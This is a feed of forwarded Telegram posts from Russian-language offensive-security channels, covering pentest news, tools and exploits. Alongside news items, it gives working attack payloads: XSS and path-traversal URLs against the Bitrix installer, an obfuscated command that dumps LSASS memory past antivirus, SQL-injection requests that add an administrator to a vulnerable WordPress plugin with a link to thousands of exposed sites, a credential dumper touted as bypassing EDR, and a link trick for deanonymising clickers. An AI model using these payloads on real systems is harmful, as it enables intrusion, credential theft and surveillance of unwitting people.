Forwarded from SecurityLab.ru
Критическая брешь в HTTP/2: CONTINUATION Flood приводит к мощнейшим DoS-атакам
🔒 Исследователь в области кибербезопасности Бартек Новотарски обнаружил уязвимость в протоколе HTTP/2, получившую название «HTTP/2 CONTINUATION Flood».
🥷 Злоумышленник может использовать эту уязвимость для DoS-атаки, отправив бесконечный поток заголовков, что приведет к переполнению памяти сервера и его аварийному завершению работы.
💡 Брешь затрагивает множество популярных проектов, таких как Apache HTTP Server, Apache Tomcat, Golang и Node.js. В качестве временного решения рекомендуется отключить поддержку HTTP/2 на сервере, до применения обновления, чтобы избежать потенциальных атак.
#CyberSecurity #HTTP2Vulnerability #DoSAttack @SecLabNews
#CyberSecurity #HTTP2Vulnerability #DoSAttack @SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Страшнее, чем «Rapid Reset»: в протоколе HTTPS/2 выявлена новая фундаментальная уязвимость
«CONTINUATION Flood» позволяет проводить мощнейшие DoS-атаки.
🤯1
Forwarded from SHADOW:Group
Для установки Битрикса есть скрипт
bitrixsetup.php, который разработчики рекомендуют удалять после установки, но, как выяснилось, не все это делают. При обнаружении этого скрипта основной вектор атаки, который приходит в голову, это переустановить CMS и загрузить веб-шелл через административную панель.Иногда админы просто ограничивают права на запись в директорию и считают, что этого будет достаточно, однако данный скрипт сам по себе оказался уязвим к XSS и LFR:
XSS:
https://target.com/bitrixsetup.php?action=UNPACK&filename=<img src='' onerror=alert(document.domain)>
LFR:
https://target.com/bitrixsetup.php?action=UNPACK&filename=../../../../etc/passwd
Более подробно читайте в статье на хабре.
#web #bitrix #xss #lfr
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Удалить нельзя эксплуатировать: как мы нашли уязвимость в установщике Битрикс
Источник: https://www.reddit.com/r/LofiGirl/comments/ipf71o/lo_fi_romanian_programmer_i_created_for_rromania/ Методология тестирования на проникновение предполагает разделение поиска уязвимостей на...
❤1
Forwarded from PT SWARM
🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well!
A brief instruction for red teams:
1. Compile our enhanced DLL;
2. Use NetSPI's ruler and wait!
No back connect required!
🔥 📐📏
A brief instruction for red teams:
1. Compile our enhanced DLL;
2. Use NetSPI's ruler and wait!
No back connect required!
🔥 📐📏
🔥1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Ну это прям реально полный гайд по Bloodhound CE. Для тех, кто ещё старым пользуется.
https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf
#pentest #enum #bloodhound
https://m4lwhere.medium.com/the-ultimate-guide-for-bloodhound-community-edition-bhce-80b574595acf
#pentest #enum #bloodhound
Medium
The Ultimate Guide for BloodHound Community Edition (BHCE)
I’ve run into many interested hackers who want to learn how to use BloodHound, but struggle to get started. Here’s how to be effective!
Forwarded from cKure Red
of Privilege Vulnerability (CVE-2024-21338).
https://github.com/hakaioffsec/CVE-2024-21338
https://hakaisecurity.io/cve-2024-21338-from-admin-to-kernel-through-token-manipulation-and-windows-kernel-exploitation/research-blog/
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - hakaioffsec/CVE-2024-21338: Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11…
Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled. - hakaioffsec/CVE-2024-21338
❤1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Ой, красота))) Получить данные из LSA без дампа LSASS.
Tool: https://github.com/Meowmycks/LetMeowIn?tab=readme-ov-file
Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b
#redteam #pentest #creds #dump
Historically was able to (and may presently still) bypass:
* Windows Defender
* Malwarebytes Anti-Malware
* CrowdStrike Falcon EDR (Falcon Complete + OverWatch)
Tool: https://github.com/Meowmycks/LetMeowIn?tab=readme-ov-file
Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b
#redteam #pentest #creds #dump
GitHub
GitHub - Meowmycks/LetMeowIn: A sophisticated, covert Windows-based credential dumper using C++ and MASM x64.
A sophisticated, covert Windows-based credential dumper using C++ and MASM x64. - Meowmycks/LetMeowIn
Obfuscated LSASS dumper command
😨 Подробнее, почему такое вообще возможно
&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
$_.FullName }), `#-999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full;
😨 Подробнее, почему такое вообще возможно
❤2🥴1
Forwarded from RedTeam brazzers (Pavel Shlundin)
@yurystrozhevsky, выпустил статью про ACL в Active Directory, максимально подробно и с объяснениями. Рекомендую к прочтению 👍. https://habr.com/ru/articles/809485/
Хабр
Всё что вы хотели знать про ACL в Active Directory
Введение В данной статье я постарался максимально полно и глубоко рассказать про построение и внутреннее использование ACL (Access Control List) внутри Active Directory. В этой статье нет рассказов...
Forwarded from RedTeam brazzers (Миша)
Иногда для реализации самых интересных векторов атак и осуществления умопомрачительных бизнес-целей требуется найти сегмент с АСУ ТП (привет пхд :) ). Есть несколько разных подходов:
- Можно пробовать обнаружить устройства с несколькими сетевыми интерфейсами. Ведь админ может взять и пробросить себе доступ куда не следует. Здесь, при отсутствии учетных данных, можно использовать NetBIOS , DNS, broadcast-igmp-discovery, IOXIDResolver . При наличии кредов от ДА можно обратить внимание на Powershell:
- Можно просто осуществлять поиск подсетей, извлекая их как с DC (Спасибо Димону Неверову)
Никто не запрещает и сдампить ADIDNS или обратиться к скриптам по типу tracebuster.py
- Помимо всего, иногда попадаются на глаза различные интересные службы — тот же SNMP. Или веб-админка какая-нибудь торчит. В таком случае на помощь придет httpx и aquatone
Тем не менее, основным мотивом поста стал инструмент Redpoint, нацеленный специально на АСУ ТП устройства. Репозиторий содержит в себе различные .nse скрипты для обнаружения подобных девайсов.
В связи с чем, можно с уверенностью говорить, что не один завод не устоит перед нами))))
Главное не перетрудиться, чтобы не случилась ситуация из мема 😃
- Можно пробовать обнаружить устройства с несколькими сетевыми интерфейсами. Ведь админ может взять и пробросить себе доступ куда не следует. Здесь, при отсутствии учетных данных, можно использовать NetBIOS , DNS, broadcast-igmp-discovery, IOXIDResolver . При наличии кредов от ДА можно обратить внимание на Powershell:
Invoke-Command -ComputerName $(Get-Content comps.txt) -ScriptBlock {ipconfig}- Можно просто осуществлять поиск подсетей, извлекая их как с DC (Спасибо Димону Неверову)
dsquery subnet , так и через рекурсивное хождение на машины: CornerShot , TrustMeter . Подобный функционал есть и в ldeep :sudo ldeep ldap -u reguser -p 'Password123' -d domain.ltd -s ldap://192.168.0.147 subnets
Никто не запрещает и сдампить ADIDNS или обратиться к скриптам по типу tracebuster.py
- Помимо всего, иногда попадаются на глаза различные интересные службы — тот же SNMP. Или веб-админка какая-нибудь торчит. В таком случае на помощь придет httpx и aquatone
./httpx -l hosts.txt -silent -o res.txt [-http-proxy socks5://127.0.0.1:1337]
cat res.txt | ./aquatone [-proxy socks5://127.0.0.1:1337]
Тем не менее, основным мотивом поста стал инструмент Redpoint, нацеленный специально на АСУ ТП устройства. Репозиторий содержит в себе различные .nse скрипты для обнаружения подобных девайсов.
BACnet-discover-enumerate.nse - Identify and enumerate BACnet devices
codesys-v2-discover.nse - Identify and enumerate CoDeSys V2 controllers
enip-enumerate.nse - Identify and enumerate EtherNet/IP devices from Rockwell Automation and other vendors
fox-info.nse - Identify and enumerate Niagara Fox devices
modicon-info.nse - Identify and enumerate Schneider Electric Modicon PLCs
omron-info.nse - Identify and enumerate Omron PLCs
pcworx-info.nse - Identify and enumerate PC Worx Protocol enabled PLCs
proconos-info.nse - Identify and enumerate ProConOS enabled PLCs
s7-enumerate.nse - Identify and enumerate Siemens SIMATIC S7 PLCs
В связи с чем, можно с уверенностью говорить, что не один завод не устоит перед нами))))
Главное не перетрудиться, чтобы не случилась ситуация из мема 😃
GitHub
GitHub - hdm/nextnet: nextnet is a pivot point discovery tool written in Go.
nextnet is a pivot point discovery tool written in Go. - hdm/nextnet
Forwarded from b␢code
t.me/username?text=Hello для вставки заготовленного текста в поле ввода сообщения. Нашел этому очень интересное применение, можно деанонить людей которые кликнули на ссылку. Вот пример ссылки. Если вы просто нажмете на него, мне придет уведомление что вы перешли
Так же сделал телеграм бота для создания таких ссылок: @inlinequery_bot
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Path Secure (CuriV)
Привет!
Я проводил множество собесов для админов и пентестеров, менторил несколько человек по разным аспектам наступательной информационной безопасности, сам участвовал в собесах. Мне нравится как разные вопросы позволяют пролить свет на глубину знаний человека в той или иной области.
Решил создать и курировать репозиторий с вопросами по наступательной безопасности на русском языке. Почему-то я не нашел такой репозиторий сразу. На английском языке таких огромное колличество и все они имею свои плюсы и минусы.
Этот репозиторий содержит в себе компиляцию вопросов по наступательной безопасности (offensive security). Используя этот материал, можно подготовиться к предстоящему собеседованию или прикинуть какие области знаний Вами не покрыты для самостоятельного обучения. Хороший интервьюер всегда задаст более глубокий и уточняющий вопрос, а соискателю будет невероятно полезно осознавать что еще ему стоит подучить или хотя бы иметь ввиду.
Проект является личной инициативой и несет в себе исключительно альтруистические цели. Проект является открытым, каждый желающий может сделать форк или предложить изменения в существующий список вопросов мне в личку в телеге (@curiv). Порядок вопросов и их категория носят субъективный характер. Репозиторий будет наполняться с течением времени, список источников представлен в последнем разделе. Вопросы будут агрегироваться из источников, список источников также будет пополняться. Если оставите положительные реакции, то мне будет приятно ❤️
https://github.com/curiv/russian-offensive-security-questions
#pentest #interview #repository
Я проводил множество собесов для админов и пентестеров, менторил несколько человек по разным аспектам наступательной информационной безопасности, сам участвовал в собесах. Мне нравится как разные вопросы позволяют пролить свет на глубину знаний человека в той или иной области.
Решил создать и курировать репозиторий с вопросами по наступательной безопасности на русском языке. Почему-то я не нашел такой репозиторий сразу. На английском языке таких огромное колличество и все они имею свои плюсы и минусы.
Этот репозиторий содержит в себе компиляцию вопросов по наступательной безопасности (offensive security). Используя этот материал, можно подготовиться к предстоящему собеседованию или прикинуть какие области знаний Вами не покрыты для самостоятельного обучения. Хороший интервьюер всегда задаст более глубокий и уточняющий вопрос, а соискателю будет невероятно полезно осознавать что еще ему стоит подучить или хотя бы иметь ввиду.
Проект является личной инициативой и несет в себе исключительно альтруистические цели. Проект является открытым, каждый желающий может сделать форк или предложить изменения в существующий список вопросов мне в личку в телеге (@curiv). Порядок вопросов и их категория носят субъективный характер. Репозиторий будет наполняться с течением времени, список источников представлен в последнем разделе. Вопросы будут агрегироваться из источников, список источников также будет пополняться. Если оставите положительные реакции, то мне будет приятно ❤️
https://github.com/curiv/russian-offensive-security-questions
#pentest #interview #repository
GitHub
GitHub - curiv/russian-offensive-security-questions: Репозиторий содержит список вопросов по наступальной безопасности.
Репозиторий содержит список вопросов по наступальной безопасности. - GitHub - curiv/russian-offensive-security-questions: Репозиторий содержит список вопросов по наступальной безопасности.
👍1
Forwarded from 1N73LL1G3NC3
Since "q" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly.
Adding a new WordPress user:
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28Giving the user admin rights:
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6cPWNED!
Note: Param "integ" is the md5sum of the query.
6K+ Services are found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22
Tweet: https://x.com/mrtuxracer/status/1784229071460692232?s=12
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Эффект пентестера
NucleiScanner = Nuclei + Subfinder + Gau + Paramspider + httpx
https://github.com/0xKayala/NucleiScanner
https://github.com/0xKayala/NucleiScanner
GitHub
GitHub - 0xKayala/NucleiScanner: NucleiScanner is a Powerful Automation tool for detecting Unknown Vulnerabilities in the Web Applications
NucleiScanner is a Powerful Automation tool for detecting Unknown Vulnerabilities in the Web Applications - 0xKayala/NucleiScanner
Forwarded from Волосатый бублик
#adcs #bloodhound #ad
[ ADCS Attack Paths in BloodHound ]
This blog post(s) details the domain escalation requirements and explains how BloodHound incorporates the relevant components. SpectrOps team will demonstrate how to effectively use BloodHound to identify attack paths that involve ESC abuse.
Part 1
Part 2
[ ADCS Attack Paths in BloodHound ]
This blog post(s) details the domain escalation requirements and explains how BloodHound incorporates the relevant components. SpectrOps team will demonstrate how to effectively use BloodHound to identify attack paths that involve ESC abuse.
Part 1
Part 2
👍1
Forwarded from true_security
https://github.com/fortra/impacket/pull/1719
дамп sam/system/security через shadowcopy
дамп sam/system/security через shadowcopy
GitHub
[SECRETSDUMP] New Dump Method - Shadow Snapshot Method via WMI by PeterGabaldon · Pull Request #1719 · fortra/impacket
[UPDATE]
Thanks to @Veids and its advice, it is now working without RCE. It was my mistake that I implemented it bad, but now it is working. SAM/SYSTEM/SECURITY are downloaded via SMB from the Shad...
Thanks to @Veids and its advice, it is now working without RCE. It was my mistake that I implemented it bad, but now it is working. SAM/SYSTEM/SECURITY are downloaded via SMB from the Shad...